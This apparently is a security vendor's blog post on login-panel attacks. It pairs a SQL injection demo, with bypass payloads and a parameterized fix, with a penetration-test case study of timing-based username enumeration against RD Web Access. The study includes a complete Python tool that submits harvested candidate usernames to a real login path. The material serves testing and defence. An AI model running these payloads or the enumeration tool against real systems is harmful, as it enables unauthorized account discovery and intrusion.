Username Harvesting Through RDP Web Access


Login panels of any type are a common target for attackers. Getting in, either through weak credentials or a software vulnerability, gives an attacker fast access to whatever sits behind the panel, and that data is often extremely sensitive. Beyond the data itself, a foothold from the outside can expose the internal network to further attack, up to and including ransomware.

Login Panel Attacks

There are many ways to attack a login panel, and they serve different goals. Usually the goal is to get through the panel and reach whatever is behind it, but not always. Some vulnerabilities give access to far more than the application, such as the filesystem of the host running the panel or the back-end database, and attackers can often achieve several of these goals at once.

SQL Injection vulnerabilities are common in login panels. They arise from the way the front-end application checks the submitted credentials against the back-end database: if the username and password are concatenated into the SQL query text instead of being passed as parameters, an attacker can supply input that changes the query, bypassing the login check or reading the database directly. Depending on the database engine and its privileges, the impact can go further, such as reading files or running commands on the host OS.
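The following added example (not code from the original post or from Blue Goat) shows the mechanism described above on a constructed SQLite users table: a login check that concatenates user input into the query, beside the parameterized version that treats the same input as plain data. The table contents and the payloads are constructed for the demonstration, and the password is stored in plaintext only to keep the example short.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table for the demonstration."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    # Plaintext password purely for brevity; real systems store a salted hash.
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret-admin-pw')")
    conn.commit()
    return conn


def build_vulnerable_query(username: str, password: str) -> str:
    """The classic mistake: user input pasted straight into the SQL text."""
    return (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Returns True when the (attacker-controllable) query matches any row.

    Input such as  admin' --  closes the string literal and comments out the
    password check; a password of  ' OR '1'='1  makes the WHERE clause always
    true. Either way the caller is "logged in" without knowing a password.
    """
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterized version: the driver sends the values separately from the
    SQL text, so quotes and comment markers in the input are just characters
    compared against the stored column values."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    for user, pw in [("admin", "wrong"), ("admin' --", "wrong"), ("x", "' OR '1'='1")]:
        print(f"{user!r:16} {pw!r:14} vulnerable={login_vulnerable(db, user, pw)} "
              f"safe={login_safe(db, user, pw)}")
```

Python's sqlite3 driver refuses to execute more than one statement per call, so stacked-query payloads do not work here; other database engines and drivers differ, which is why the impact of injection in a real login panel depends on the back end.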

Even without a software vulnerability, login panels are valuable to attackers. Open sources can be mined for potentially valid usernames, which can then be tried against the panel to see whether any user's password can be guessed. It is also common to search old data breaches for the enumerated logins, since reused passwords are frequently found there.

In many cases, login panels are misconfigured so that they disclose whether an account exists. This happens when there is a consistent difference between the responses for valid and invalid usernames: a different error message, a different status code or redirect, or a different response time. Attackers abuse this to build a list of known valid usernames and then run a much more targeted attack against those accounts.

Case Study

Remote Desktop Protocol is a prime target for attackers. Access over RDP gives an immediate path onto internal machines and lets an attacker start moving through the network. RDP is often an internal-only service, but it can be exposed externally as well, either directly on the RDP port or through an RD Web Access panel.

During an External Penetration Test, our team discovered open RDP ports along with an RD Web Access panel. This was of immediate interest, as password-spraying attacks against these can provide good value. The problem with attacking RDP is that the protocol is slow and brute forcing it takes a lot of time, so carefully crafting a targeted attack is vital.

RD Web Access panels before Windows Server 2022 have a username enumeration vulnerability. It comes from a timing difference between login attempts with a valid username and those with an invalid one: valid usernames are answered much faster than invalid ones. If no response has arrived after waiting 1250 milliseconds, the account can be marked as invalid.

Blue Goat was able to work out the organization's username naming convention from open sources and begin the attack. By harvesting employee names from LinkedIn and other social media platforms, we compiled a list of candidate usernames and submitted them to the login panel, refining the list down to only valid accounts before proceeding. Publicly available exploit code and a Metasploit module streamline this attack.
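The workflow of the two preceding paragraphs, as an added example that is not code from the original post, from Blue Goat, or from the Metasploit module mentioned above: expand harvested names into common naming conventions, then classify each candidate by whether the RD Web Access login form answers within the 1250 ms window. The login path and form field names in `rdweb_poster` are assumptions based on the default RD Web Access page and may need adjusting for a given target; `simulated_poster` is a constructed offline stand-in that reproduces the timing behaviour the post describes so the script runs without a server. Only use this against systems you are authorized to test.

```python
"""Timing-based username enumeration against an RD Web Access login form."""
import socket
import time
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Iterable

# Valid usernames are answered well inside 1250 ms; a request still pending
# at 1.25 s is classified as an invalid username.
TIMEOUT_SECONDS = 1.25
LOGIN_PATH = "/RDWeb/Pages/en-US/login.aspx"   # assumed default RDWeb path

# A Poster submits one login attempt and returns when the server answers,
# raising TimeoutError/socket.timeout if nothing arrives within `timeout`.
Poster = Callable[[str, float], None]


def candidate_usernames(names: Iterable[tuple[str, str]], domain: str) -> list[str]:
    """Expand (first, last) pairs into DOMAIN\\user candidates, deduplicated."""
    conventions = (
        lambda f, l: f"{f}.{l}",    # john.smith
        lambda f, l: f"{f[0]}{l}",  # jsmith
        lambda f, l: f"{f}{l[0]}",  # johns
        lambda f, l: f"{f}_{l}",    # john_smith
    )
    seen: set[str] = set()
    out: list[str] = []
    for first, last in names:
        f, l = first.strip().lower(), last.strip().lower()
        for conv in conventions:
            user = f"{domain}\\{conv(f, l)}"
            if user not in seen:
                seen.add(user)
                out.append(user)
    return out


def rdweb_poster(base_url: str) -> Poster:
    """Poster for a real RD Web Access instance (form field names assumed)."""
    def post(username: str, timeout: float) -> None:
        body = urllib.parse.urlencode({
            "DomainUserName": username,
            "UserPass": "Password1",  # any value; only the username is under test
            "WorkSpaceID": "", "RDPCertificates": "", "PublicModeTimeout": "20",
            "WorkspaceFriendlyName": "", "EventLogUploadAddress": "",
            "isUtf8": "1", "flags": "0",
        }).encode()
        req = urllib.request.Request(
            base_url.rstrip("/") + LOGIN_PATH, data=body,
            headers={"Content-Type": "application/x-www-form-urlencoded"})
        try:
            with urllib.request.urlopen(req, timeout=timeout):
                pass                  # any status that arrives in time counts
        except urllib.error.HTTPError:
            pass                      # 4xx/5xx still arrived in time
        except urllib.error.URLError as exc:
            if isinstance(exc.reason, (socket.timeout, TimeoutError)):
                raise TimeoutError(str(exc)) from exc
            raise                     # connection refused etc. is a real error
    return post


def probe(post: Poster, username: str, timeout: float = TIMEOUT_SECONDS) -> tuple[bool, float]:
    """Return (looks_valid, elapsed_seconds) for a single username."""
    start = time.monotonic()
    try:
        post(username, timeout)
        answered = True
    except (socket.timeout, TimeoutError):
        answered = False
    return answered, time.monotonic() - start


def enumerate_valid(post: Poster, candidates: Iterable[str],
                    timeout: float = TIMEOUT_SECONDS, confirm: bool = True) -> list[str]:
    """Keep candidates that answer in time; with `confirm`, a name must answer
    in time on two separate probes so one stray fast reply (a transient
    error page, for instance) is not reported as a valid account."""
    valid = []
    for user in candidates:
        looks_valid, _ = probe(post, user, timeout)
        if looks_valid and confirm:
            looks_valid, _ = probe(post, user, timeout)
        if looks_valid:
            valid.append(user)
    return valid


def simulated_poster(valid_users: set[str]) -> Poster:
    """Constructed offline stand-in for rdweb_poster: immediate answer for a
    valid user, silence past the timeout for anyone else."""
    def post(username: str, timeout: float) -> None:
        if username in valid_users:
            return
        time.sleep(timeout)
        raise TimeoutError("no response before timeout")
    return post


if __name__ == "__main__":
    harvested = [("John", "Smith"), ("Ana", "Lopez")]        # constructed sample
    fake = simulated_poster({"CORP\\jsmith", "CORP\\ana.lopez"})
    print(enumerate_valid(fake, candidate_usernames(harvested, "CORP"), timeout=0.05))
```

Against a real target, replace `fake` with `rdweb_poster("https://rds.example.com")` and keep the default timeout. Every probe is one failed logon for that username, so throttle the loop on engagements where account lockout could disrupt real users.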

This vulnerability is inherent to RD Web Access on Windows Server 2016 (and, as noted above, other versions before Server 2022), and the fix is to upgrade to Server 2022. Microsoft supports in-place upgrades from Server 2016 to 2022, though dependencies do not always allow it. If upgrading the host OS is not possible, configuring the network to block brute-force attempts and restrict offending sources helps limit these attacks. Note that account lockout alone does not stop enumeration, since each probe is a single failed logon and the check depends only on the username; rate limiting and alerting on failed logons at the web access endpoint are the useful controls.

Defend Your Network With Blue Goat Cyber

Blue Goat can help you meet your security goals through our various types of tests. We will work with you to identify the holes in your defenses and harden your organization against attacks from cybercriminals. Contact us to schedule a meeting and find the right solution for your team.
